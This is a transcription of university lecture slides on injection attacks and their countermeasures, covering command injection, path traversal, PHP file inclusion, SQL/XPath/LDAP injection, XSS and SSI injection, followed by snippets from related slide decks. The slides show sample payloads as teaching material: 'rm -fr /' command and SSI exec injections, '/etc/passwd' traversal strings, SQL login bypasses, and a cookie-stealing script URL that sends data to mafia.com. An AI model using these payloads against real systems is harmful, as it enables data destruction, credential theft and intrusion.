Software Security problems. Erik Poll. Digital Security group Radboud University Nijmegen
|
|
- Julie Harper
- 6 years ago
- Views:
Transcription
1 Software Security problems Erik Poll Digital Security group Radboud University Nijmegen
2 Problems with Insecure input handling is the most common security problem aka lack of input validation, but that terminology is misleading (as we ll see) All input is dangerous & evil All input should be treated as highly poisonous & contagious Terminology: input is tainted data Untrusted input or untrusted user input are pleonastic expressions: by default, any input should be untrusted Input problems we already saw: buffer overflows, format string attacks, integer overflows 2
3 Examples of input attacks Overview Countermeasures sandboxing input validation & output encoding tackling the problem at more fundamental levels LangSec programming-language support with domainspecific language extentions (Wyvern) 3
4 Overview OS command injection path traversal chroot jail PHP injection remote and local SQL injection 2 nd order SQL injection Blind SQL injection HTML injection/xss httponly CSP (Content Security Policy) SSI (Server Side Includes) injection 4
5 Command injection A CGI shell script used as part of a website might contain cat thefile mail clientadres An attacker might enter address erik@cs.ru.nl rm fr / What happens then? cat thefile mail erik@cs.ru.nl rm fr / Can you think of countermeasures? validating input (aka sanitising input) removing or escaping dangerous characters, e.g. > < & better: check that clientadres is well-formed address reduce access rights of this CGI script (defense in depth) maybe we shouldn t use a scripting language for this? 5
6 Command injection Many API calls and language constructs in languages are affected, eg shell scripts C/C++ system(), execvp(), ShellExecute(),.. Java Runtime.exec(),... Perl system, exec, open, `, /e,... Python exec, eval, input, execfile, Any use of these constructs merits close attention! A basic static analysis tool can easily warn us of their use A more advanced tool that does data flow analysis can give more precise warnings, about only those uses that involve user-supplied (aka tainted) arguments eg. using PREfast with clumsy [SA_Post(Tainted=SA_Yes)] annotations 6
7 Path traversal aka directory traversal File names constructed from user input esp. by string concatenation can cause problems. Eg suppose a program uses the paths 1. "/usr/local/client-info/" ++ username 2. "/usr/local/profilepictures/" ++ username ++ ".jpg" Malicious usernames for attacker to inject: 1.../../../etc/passwd 2.../../../etc/passwd%00 null terminator %00 means suffix.jpg will be ignored NB Validating file names is difficult (more on that later): reuse existing code! Additional countermeasure: restrict file access using a chroot jail 7
8 chroot jail chroot (change root) restricts access of a process to a subset of file system, ie. changes the root of file system for that process This is a form of sandboxing. Eg run an application you just downloaded with chroot /home/sos/erik/trial ; /tmp to restrict access to just these two directories Using the traditional OS access control permission for this, instead chroot, would be very tricky! This would require having to permissions right all over the file system 8
9 Attacker can Fun with path traversal look around on the file system for useful information, eg configuration or password files access special files to cause Denial-of-Service (DoS), eg../../dev/random../../var/spool/lpr (is very long to read) (is impossible to read) get application to write info in a place the attacker can access, to then read or modify. eg /mnt/usbkey or /tmp/file get application to use - ideally, execute - data on the target system that the attacker can control (see PHP examples later on) Note that this includes attacks on confidentiality, availability, and integrity 9
10 Path traversal example [thanks to Arne Swinnen] Where would you try a path name injection on https//instagram.com/?hl=en? 10 websec
11 11 websec
12 Strange input leads to the Dutch page. Why? 12 websec
13 13 websec
14 Enter fuzzdb, to fuzz common file names Fuzzdb finds 42 hits for../<guess>/../locale/nl/ Facebook bug bounty program paid Arne 500$ More instagram flaws at
15 Injection attacks on PHP PHP code can dynamically include other files, eg. based on an option chosen from menu on webpage $dir = $_GET['option'] include($dir. "/function.php") So for the URL the webserver will execute <current_directory>/1/function.php Note: here option would be a parameter in the URL, and. denotes string concatenation in PHP 15
16 Injection attacks on PHP 1. option=../../somedir/anotherdir Attacker can execute any file called function.php on server 2. option=../../somedir/anyfile.php%00 Attacker can execute any file on the server 3. option=../../john/profilepicture.jpg%00 John s profile picture will be executed as PHP code, so attacker John can execute his own PHP code if he has an account. NB this illustrates how evil can spreads with input! 4. option= Poorly configured PHP web server will now dynamically load PHP code over the web are Local File Inclusion (LFI), 4 is Remote File Inclusion (RFI) Note that 1 & 2 are like return-to-libc attacks, but for PHP instead of C. 16
17 Countermeasure: indirect selection Don't use the user input to construct a value, but use it to select from a set of legitimate values, eg $dir = $_GET['option'] if ($dir = 1){ } else { }} Downsides? include("1/function.php") if ($dir = 2){ include("2/function.php") } else {... // include nothing, of report error? More work, less flexible, and does not work in all situations. 17
18 18
19 SQL injection Username Password erik ****** 19
20 SQL injection $result = mysql_query( SELECT * FROM Accounts. WHERE Username = $username. AND Password = $password ; ); if (mysql_num_rows($result)>0) $login = true; 20
21 SQL injection Resulting SQL query SELECT * FROM Accounts WHERE Username = erik AND Password = secret ; 21
22 SQL injection Username Password OR 1=1;/* ****** 22
23 SQL injection Resulting SQL query SELECT * FROM Accounts WHERE Username = OR 1=1;/* AND Password = secret ; 23
24 SQL injection Resulting SQL query SELECT * FROM Accounts WHERE Username = OR 1=1; /* AND Password = secret ; Oops! 24
25 variation: SQL Database Command Injection Injecting SQL command with ; not manipulating SQL query with ` Highly dependent on infrastructure, eg Each database has its own commands eg. Microsoft SQL Server has exec master.dbo.xp_cmdshell Some configurations don't allow use of ; eg Oracle database accessed via Java or PL/SQL 25
26 variation: Function Call Injection Oracle SQL has over 1000 built-in functions to use in queries, eg TRANSLATE TRANSLATE('a1b2ff', 'abcdef', 'ABCDEF') = 'A1B2FF' Arguments of such functions may be poisoned with other functions, eg SELECT TRANSLATE('user input'', 'abcd', 'ABCD')FROM... can become SELECT TRANSLATE('' UTL_HTTP.REQUEST( '', 'abcd', 'ABCD')FROM... Here UTL_HTTP does HTTP request directly from the Oracle database, which is running behind the company firewall... 26
27 Example: 2 nd order SQL injection Suppose I want to access tanja's account 1. I register an account myself with the name tanja' I log in as tanja' -- and change my password 3. If the password change is done with the SQL statement UPDATE users SET password='abcd1234' WHERE username='tanja' --' and password='abc' then I have reset tanja's password Here abcd1234 is user input, but the dangerous input to the statement comes from the server's own database, where it was injected earlier The moral of the story: don't trust any input, not even data coming from sources you think can trust 27
28 Blind SQL injection Suppose results in SQL injection-prone query SELECT title, body FROM items WHERE id=2 Will we see difference response to URLs below? 1. AND 1= AND 1=2 What will be the result of../items.php?id=2 AND SUBSTRING(user,1,1) = a The same as 1 iff user starts with a; otherwise the same as 2! So we can use this to find out things about the database structure & content! 28
29 Blind SQL injection Blind SQL injection: a SQL injection where not the response itself is interesting, but the type of the response, or lack of response, leaks information to an attacker Errors can also leak interesting information: eg for IF <some condition> SELECT 1 ELSE 1/0 error message may reveal if <some condition> is true More subtle than this, response time may still leak information.. IF(SUBSTRING(user,1,1) = a, BENCHMARK(50000, ), null).. time-consuming BENCHMARK statement only executed if user starts with a 29
30 More injection possibilities 2nd order SQL injection User input, eg a username, containing malicious SQL fragment does not cause harm on first use, but is stored in the server to cause problems later Moral: don't trust anything! Blind SQL injection Response time or error message of a tainted SQL query leaks information (a so-called side channel attack) XPath injection on XML data Corrupt XPath query to access XML data, eg with ' or '1'='1' LDAP injection Corrupt LDAP query sent to LDAP server, the central repository of user info in corporate environments, eg with admin)(&) Not to mention blind XPath injection, 2nd order blind LDAP injection, etc. etc. 30
31 XML data, eg XPath injection in XML <student_database> <student><username>jan</username><passwd>abcd1234</passwd> </student> <student><username>kees</nameuser><passwd>geheim</passwd> <student> </student_database> can be accessed by XPath queries, eg (//student[username/text()='jan' and passwd/text()='abcd123']/account/text()) _database> which can be corrupted by malicious input such as ' or '1'='1' 31
32 LDAP injection An LDAP query sent to the LDAP server to authenticate a user (&(USER=jan)(PASSWD=abcd1234)) can be corrupted by giving as username admin)(&) which results in (&(USER=name)(&))(PASSWD=pwd) where only first part is used, and (&) is LDAP notation for TRUE There are also blind LDAP injection attacks. 32
33 HTML injection sos Search No matches found for sos 33
34 HTML injection <h1>sos</h1> Search c No matches found for sos 34
35 HTML injection <h1>sos</h1> Search c No matches found for <h1>sos</h1> If application escapes dangerous characters, eg by replacing < by <, then HTML tags will not be interpreted as HTML 35
36 HTML injection & XSS Web server returns HTML code injected by the user Attacker can abuse this by letting the server return his HTML content to other users by sending victims a link that will echo his HTML code (reflected HTML injection) by posting HTML content in the server, eg. a web forum (stored HTML injection) If the injected HTML contains scripts, this is called XSS (Cross Site Scripting). These scripts are executed in the browser on the victim s machine, using the victim access rights! The attacker can perform actions inside the victim s browser, or try to steal information (esp. session cookies) 36
37 Example: Reflected XSS attack via error message Suppose accessing a web page returns a webpage with the text Page not found This error page may allow a reflected XSS attack: accessing may produces a webpage with a pop-up window. An attacker could exploit this to steal cookies, by sending people containing the link ookiestealer.php?cookie='+document.cookie</script> to pass ru.nl-cookie as parameter in HTTP request to mafia.com 37
38 Protection measures for XSS httponly cookies Prevents any javascript from accessing cookies, to stop XSS attacks stealing cookies CSP (Content Security Policy) Policy that whitelists trusted sources that are allowed in a page, enforced by the browser Some protection, but not against XSS secure cookies prevents any network eavesdropper from observing cookies, by only sending them over https SOP (Single Origin Policy) Prevents javascript in 3rd party content in a webpage from accessing rest of the page.. These are no help whatsoever against (stored or reflected) XSS. 38
39 CSP example A webpage from bank.com could contain CSP header Content-Security-Policy: default-src 'self'; img-src 'self' disney.com child-src script-src apis.google.com to only allow images from bank.com itself or from disney.com embedded frames from youtube, included via https scripts from apis.google.com This is a form of sandboxing, in this case enforced by the browser. 39
40 SSI Injection Server-Side Includes (SSI) are instructions for a web server written inside HTML. For instance, to include some file <!--#include file="header.html" --> If attacker can inject HTML into a webpage, then he can try to inject a SSI directive that will be executed on the server NB: with SSI injection the injected code is executed server-side, whereas with XSS the injected javascript is executed client-side Of course, there is a directive to execute programs & scripts <!--#exec cmd="rm fr /" --> 40
41 More injection problems: OWASP list Blind SQL Injection Blind XPath Injection Code Injection Command Injection Comment Injection Attack Content Spoofing CORS RequestPreflightScrutiny Cross-site Scripting (XSS) Custom Special Character Injection Direct Dynamic Code Evaluation ('Eval Injection') Format string attack Full Path Disclosure Function Injection LDAP injection Parameter Delimiter PHP Object Injection Regular expression Denial of Service - ReDoS Resource Injection Server-Side Includes (SSI) Injection Special Element Injection SQL Injection SQL Injection Bypassing WAF Web Parameter Tampering XPATH Injection [ 41
42 More injection problems: CWE classication Several categories & clusters in the CWE classification, e.g. CWE-20 Improper Input Validation CWE-896 Tainted Input distinguishes a few dozens of variants of input attacks See
43 CWE/SANS Top 25 (out of 732!) [Version 3.0] Improper Neutralization of Special Elements used in an SQL Command... ('OS Command Injection') Buffer Overflow.. ('Cross-site Scripting') Missing Authentication for Critical Function Missing Authorization Use of Hard-coded Credentials Missing Encryption of Sensitive Data Unrestricted Upload of File with Dangerous Type Reliance on Untrusted Inputs in a Security Decision Execution with Unnecessary Privileges Cross-Site Request Forgery (CSRF) ('Path Traversal') Download of Code Without Integrity Check Incorrect Authorization Inclusion of Functionality from Untrusted Control Sphere Incorrect Permission Assignment Use of Potentially Dangerous Function Use of a Broken or Risky Cryptographic Algorithm Incorrect Calculation of Buffer Size Improper Restriction of Excessive Authentication Attempts URL Redirection to Untrusted Site ('Open Redirect') Uncontrolled Format String Integer Overflow or Wraparound Use of a One-Way Hash without a Salt 43
Software Security problems. Erik Poll. Digital Security group Radboud University Nijmegen
Software Security problems Erik Poll Digital Security group Radboud University Nijmegen Problems with Insecure input handling is the most common security problem aka lack of input validation, but that
More informationSoftware Security. Erik Poll. Digital Security group Radboud University Nijmegen
Tackling Software Security problems Erik Poll Digital Security group Radboud University Nijmegen 1 Erik Poll Recall: input attacks malicious input application a bug! malicious input application (abuse
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationSecure Programming Techniques
Secure Programming Techniques Meelis ROOS mroos@ut.ee Institute of Computer Science Tartu University spring 2014 Course outline Introduction General principles Code auditing C/C++ Web SQL Injection PHP
More informationAttacks Against Websites. Tom Chothia Computer Security, Lecture 11
Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:
More informationDEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology
DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically
More informationGUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.
Report on IRONWASP Software Product: IronWASP Description of the Product: IronWASP (Iron Web application Advanced Security testing Platform) is an open source system for web application vulnerability testing.
More informationThis slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in
1 This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in terms of prevalence (how much the vulnerability is widespread),
More informationWeb insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.
Web Security Web Programming Uta Priss ZELL, Ostfalia University 2013 Web Programming Web Security Slide 1/25 Outline Web insecurity Security strategies General security Listing of server-side risks Language
More informationOWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP
OWASP Top 10 Risks Dean.Bushmiller@ExpandingSecurity.com Many thanks to Dave Wichers & OWASP My Mom I got on the email and did a google on my boy My boy works in this Internet thing He makes cyber cafes
More informationYour Turn to Hack the OWASP Top 10!
OWASP Top 10 Web Application Security Risks Your Turn to Hack OWASP Top 10 using Mutillidae Born to Be Hacked Metasploit in VMWare Page 1 https://www.owasp.org/index.php/main_page The Open Web Application
More information7.2.4 on Media content; on XSS) sws2 1
Software and Web Security 2 Attacks on Clients (Section 7.1.3 on JavaScript; 7.2.4 on Media content; 7.2.6 on XSS) sws2 1 Last week: web server can be attacked by malicious input web browser web server
More informationMore attacks on clients: Click-jacking/UI redressing, CSRF
Web Security More attacks on clients: Click-jacking/UI redressing, CSRF (Section 7.2.3 on Click-jacking; Section 7.2.7 on CSRF; Section 7.2.8 on Defenses against client-side attacks) 1 Recall from last
More informationWeb Security (Injection) Attacks on Servers
Web Security (Injection) Attacks on Servers websec 1 Recall: dynamically created web pages Most web pages you see are dynamically created (except static pages such as http://www.cs.ru.nl/~erikpoll/websec)
More informationProvide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any
OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing
More informationCIS 4360 Secure Computer Systems XSS
CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection
More informationCNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components
CNIT 129S: Securing Web Applications Ch 10: Attacking Back-End Components Injecting OS Commands Web server platforms often have APIs To access the filesystem, interface with other processes, and for network
More informationWeb Attacks CMSC 414. September 25 & 27, 2017
Web Attacks CMSC 414 September 25 & 27, 2017 Overview SQL Injection is frequently implemented as a web-based attack, but doesn t necessarily need to be There are a wide variety of web-based attacks Some
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationSymlink attacks. Do not assume that symlinks are trustworthy: Example 1
Symlink attacks Do not assume that symlinks are trustworthy: Example 1 Application A creates a file for writing in /tmp. It assumes that since the file name is unusual, or because it encodes A's name or
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationWEB SECURITY: XSS & CSRF
WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often
More informationCopyright
1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationAttacks on Clients: JavaScript & XSS
Web Security Attacks on Clients: JavaScript & XSS (Section 7.1.3 on JavaScript; 7.2.6 on XSS) 1 Last week: attacks on the server Attacks on web server: attacker/client sends malicious input to server malicious
More informationInjection vulnerabilities: command injection and SQL injection
Injection vulnerabilities: command injection and SQL injection Questões de Segurança em Engenharia de Software (QSES) Departamento de Ciência de Computadores Faculdade de Ciências da Universidade do Porto
More information(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
More informationWeb Application & Web Server Vulnerabilities Assessment Pankaj Sharma
Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma Indian Computer Emergency Response Team ( CERT - IN ) Department Of Information Technology 1 Agenda Introduction What are Web Applications?
More information2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun
CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun Secure Coding String management Pointer Subterfuge Dynamic memory management Integer security Formatted output
More informationTHREAT MODELING IN SOCIAL NETWORKS. Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda
THREAT MODELING IN SOCIAL NETWORKS Molulaqhooa Maoyi Rotondwa Ratshidaho Sanele Macanda INTRODUCTION Social Networks popular web service. 62% adults worldwide use social media 65% of world top companies
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationCSCE 813 Internet Security Case Study II: XSS
CSCE 813 Internet Security Case Study II: XSS Professor Lisa Luo Fall 2017 Outline Cross-site Scripting (XSS) Attacks Prevention 2 What is XSS? Cross-site scripting (XSS) is a code injection attack that
More informationComputer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks
Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition Chapter 3 Investigating Web Attacks Objectives After completing this chapter, you should be able to: Recognize the indications
More information1 About Web Security. What is application security? So what can happen? see [?]
1 About Web Security What is application security? see [?] So what can happen? 1 taken from [?] first half of 2013 Let s focus on application security risks Risk = vulnerability + impact New App: http://www-03.ibm.com/security/xforce/xfisi
More informationLecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised
More informationAndrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West
Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing Advancing Expertise in Security Testing Taming the Wild West Canberra, Australia 1 Who is this guy? Andrew
More informationC1: Define Security Requirements
OWASP Top 10 Proactive Controls IEEE Top 10 Software Security Design Flaws OWASP Top 10 Vulnerabilities Mitigated OWASP Mobile Top 10 Vulnerabilities Mitigated C1: Define Security Requirements A security
More information"Charting the Course to Your Success!" Securing.Net Web Applications Lifecycle Course Summary
Course Summary Description Securing.Net Web Applications - Lifecycle is a lab-intensive, hands-on.net security training course, essential for experienced enterprise developers who need to produce secure.net-based
More informationPerslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.
Eleonora Petridou Pascal Cuylaerts System And Network Engineering University of Amsterdam June 30, 2011 Outline Research question About Perslink Approach Manual inspection Automated tests Vulnerabilities
More informationWelcome to the OWASP TOP 10
Welcome to the OWASP TOP 10 Secure Development for Java Developers Dominik Schadow 03/20/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN 1 AGENDA
More informationCS 161 Computer Security
Raluca Ada Popa Spring 2018 CS 161 Computer Security Discussion 9 Week of March 19, 2018 Question 1 Warmup: SOP (15 min) The Same Origin Policy (SOP) helps browsers maintain a sandboxed model by preventing
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationlast time: command injection
Web Security 1 last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string
More informationApplication Security through a Hacker s Eyes James Walden Northern Kentucky University
Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways
More informationCS 356 Software Security. Fall 2013
CS 356 Software Security Fall 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists Chapter 5 Database
More informationEthical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities
Ethical Hacking and Countermeasures: Web Chapter 3 Web Application Vulnerabilities Objectives After completing this chapter, you should be able to: Understand the architecture of Web applications Understand
More informationWeb Application Vulnerabilities: OWASP Top 10 Revisited
Pattern Recognition and Applications Lab Web Application Vulnerabilities: OWASP Top 10 Revisited Igino Corona igino.corona AT diee.unica.it Computer Security April 5th, 2018 Department of Electrical and
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 4 Week of February 13, 2017 Question 1 Clickjacking (5 min) Watch the following video: https://www.youtube.com/watch?v=sw8ch-m3n8m Question 2 Session
More informationSecurity and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web
Security and Privacy SWE 432, Fall 2016 Design and Implementation of Software for the Web Today Security What is it? Most important types of attacks Privacy For further reading: https://www.owasp.org/index.php/
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationSichere Software vom Java-Entwickler
Sichere Software vom Java-Entwickler Dominik Schadow Java Forum Stuttgart 05.07.2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN We can no longer
More informationWeb Security 2 https://www.xkcd.com/177/ http://xkcd.com/1323/ Encryption basics Plaintext message key secret Encryp)on Func)on Ciphertext Insecure network Decryp)on Func)on Curses! Foiled again! key Plaintext
More informationOWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati
OWASP TOP 10 2017 Release Andy Willingham June 12, 2018 OWASP Cincinnati Agenda A quick history lesson The Top 10(s) Web Mobile Privacy Protective Controls Why have a Top 10? Software runs the world (infrastructure,
More informationSECURE CODING ESSENTIALS
SECURE CODING ESSENTIALS DEFENDING YOUR WEB APPLICATION AGAINST CYBER ATTACKS ROB AUGUSTINUS 30 MARCH 2017 AGENDA Intro - A.S. Watson and Me Why this Presentation? Security Architecture Secure Code Design
More informationWeb Security. Thierry Sans
Web Security Thierry Sans 1991 Sir Tim Berners-Lee Web Portals 2014 Customer Resources Managemen Accounting and Billing E-Health E-Learning Collaboration Content Management Social Networks Publishing Web
More informationVulnerabilities in web applications
Vulnerabilities in web applications Web = Client + Server Client (browser) request HTTP response Server HTTP request contains the URL of the resource and the header HTTP response contains a status code,
More informationCSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the server-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Threat model In these scenarios: The server is benign The client is malicious The client
More informationCertified Secure Web Application Secure Development Checklist
www.certifiedsecure.com info@certifiedsecure.com Tel.: +31 (0)70 310 13 40 Loire 128-A 2491 AJ The Hague The Netherlands About Certified Secure Checklist Certified Secure exists to encourage and fulfill
More informationEasyCrypt passes an independent security audit
July 24, 2017 EasyCrypt passes an independent security audit EasyCrypt, a Swiss-based email encryption and privacy service, announced that it has passed an independent security audit. The audit was sponsored
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Semester 2, 2017 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2465 1 Assignment
More informationLecture Overview. IN5290 Ethical Hacking
Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp
More informationLecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks
IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp
More informationCertified Secure Web Application Security Test Checklist
www.certifiedsecure.com info@certifiedsecure.com Tel.: +31 (0)70 310 13 40 Loire 128-A 2491 AJ The Hague The Netherlands Certified Secure Checklist About Certified Secure exists to encourage and fulfill
More informationApplication security : going quicker
Application security : going quicker The web application firewall example Agenda Agenda o Intro o Application security o The dev team approach o The infra team approach o Impact of the agility o The WAF
More informationComputer Security 3e. Dieter Gollmann. Chapter 18: 1
Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter
More informationEngineering Your Software For Attack
Engineering Your Software For Attack Robert A. Martin Senior Principal Engineer Cyber Security Center Center for National Security The MITRE Corporation 2013 The MITRE Corporation. All rights reserved.
More informationA1 (Part 1): Injection Command and Code injection
A1 (Part 1): Injection Command and Code injection A1 Injection Tricking an application into executing commands or code embedded in data Data and code mixing! Often injected into interpreters SQL, PHP,
More informationSAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0
Welcome BIZEC Roundtable @ IT Defense, Berlin SAP Security BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0 February 1, 2013 Andreas Wiegenstein CTO, Virtual Forge 2 SAP Security SAP security is a complex
More informationCHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS
180 CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS 8.1 SUMMARY This research has focused on developing a Web Applications Secure System from Code Injection Vulnerabilities through Web Services (WAPS-CIVS),
More informationPROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH
Faculty of Computer Science Institute of Systems Architecture, Operating Systems Group PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH THE WEB AS A DISTRIBUTED SYSTEM 2 WEB HACKING SESSION 3 3-TIER persistent
More informationInformation Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationCIS 700/002 : Special Topics : OWASP ZED (ZAP)
CIS 700/002 : Special Topics : OWASP ZED (ZAP) Hitali Sheth CIS 700/002: Security of EMBS/CPS/IoT Department of Computer and Information Science School of Engineering and Applied Science University of
More informationWeb Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le
Web Security Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le Topics Web Architecture Parameter Tampering Local File Inclusion SQL Injection XSS Web Architecture Web Request Structure Web Request Structure
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Cross-site Scripting What is Cross-site Scripting (XSS)? Vulnerability in web application that enables attackers to inject client-side
More informationANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things. OWASP Wednesday 25 th May The OWASP Foundation
ANZTB SIGIST May 2011 Perth OWASP How minor vulnerabilities can do very bad things Christian Frichot / David Taylor (Some of) Perth OWASP s Chapter Leads OWASP Wednesday 25 th May 2011 Copyright The OWASP
More informationWeb Vulnerabilities. And The People Who Love Them
Web Vulnerabilities And The People Who Love Them Me Tom Hudson Technical Trainer at Sky Betting & Gaming TomNomNom online Occasional bug hunter Lover of analogies Lover of questions Insecure Direct Object
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationNET 311 INFORMATION SECURITY
NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)
More information2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.
Secure Coding CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun String management Pointer Subterfuge Dynamic memory management Integer security Formatted output
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationWeb 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007
Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1
